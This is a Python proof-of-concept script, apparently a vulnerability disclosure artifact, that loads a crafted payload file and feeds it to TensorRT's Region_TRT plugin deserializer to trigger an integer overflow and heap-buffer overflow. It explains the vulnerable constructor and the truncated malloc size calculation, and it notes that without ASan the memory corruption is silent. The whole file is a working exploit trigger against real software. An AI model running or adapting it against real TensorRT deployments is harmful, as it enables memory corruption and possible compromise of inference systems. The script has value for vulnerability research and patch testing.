File size: 4,621 Bytes
398500f | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 | #!/usr/bin/env python3
"""
Trigger TensorRT Region plugin heap overflow via deserialize_plugin().
This script loads a malicious serialized payload and feeds it to
RegionPluginCreator.deserialize_plugin(), which internally calls
Region::Region(buffer, length) — the vulnerable deserialization constructor.
Requirements:
- TensorRT Python package (pip install tensorrt)
- TensorRT OSS plugin library (libnvinfer_plugin.so) built from source
https://github.com/NVIDIA/TensorRT
For ASan detection, build the OSS plugins with:
cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address"
make -j$(nproc) nvinfer_plugin
Usage:
python3 gen_payload.py # generates malicious_region_payload.bin
python3 trigger_deserialize.py # triggers the heap overflow
"""
import ctypes
import struct
import sys
import os
import glob
def find_and_load_plugin_lib():
"""Try to find and load libnvinfer_plugin.so with OSS plugins."""
search_paths = [
# Built from TensorRT OSS source
"TensorRT/build/out/libnvinfer_plugin.so",
"/content/TRT/build/out/libnvinfer_plugin.so",
# Docker container
"/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
]
# Also search LD_LIBRARY_PATH
for p in os.environ.get("LD_LIBRARY_PATH", "").split(":"):
if p:
search_paths.append(os.path.join(p, "libnvinfer_plugin.so"))
for path in search_paths:
for match in glob.glob(path):
if os.path.exists(match):
return match
return None
def main():
payload_file = "malicious_region_payload.bin"
if len(sys.argv) > 1:
payload_file = sys.argv[1]
if not os.path.exists(payload_file):
print(f"[-] {payload_file} not found. Run gen_payload.py first.")
sys.exit(1)
with open(payload_file, "rb") as f:
payload = f.read()
print(f"[+] Loaded {payload_file}: {len(payload)} bytes")
# Load TensorRT
try:
import tensorrt as trt
print(f"[+] TensorRT {trt.__version__}")
except ImportError:
print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
sys.exit(1)
# Load OSS plugin library (contains Region_TRT)
plugin_path = find_and_load_plugin_lib()
if plugin_path:
print(f"[+] Loading plugin lib: {plugin_path}")
ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL).initLibNvInferPlugins(None, b'')
else:
print("[!] OSS plugin library not found, trying default registry...")
# Find Region_TRT creator
region_creator = None
for c in trt.get_plugin_registry().all_creators:
if c.name == "Region_TRT":
region_creator = c
break
if not region_creator:
print("[-] Region_TRT plugin not found in registry.")
print(" Build TensorRT OSS plugins first:")
print(" git clone https://github.com/NVIDIA/TensorRT.git")
print(" cd TensorRT && mkdir build && cd build")
print(" cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF")
print(" make -j$(nproc) nvinfer_plugin")
sys.exit(1)
print(f"[+] Region_TRT v{region_creator.plugin_version}")
# Parse payload header for display
if len(payload) >= 32:
C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0)
flags = list(payload[24:32])
print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}")
print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}")
if len(payload) >= 36:
n_val = struct.unpack_from("<i", payload, 32)[0]
print(f"[*] smTreeTemp->n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})")
print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)")
print()
print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...")
print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow")
print("[!] Expected: heap-buffer-overflow (visible with ASan)")
print()
try:
bad_plugin = region_creator.deserialize_plugin("region", payload)
print(f"[+] Plugin deserialized (returned: {bad_plugin})")
print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")
except Exception as e:
print(f"[!] Exception during deserialization: {e}")
if __name__ == "__main__":
main()
|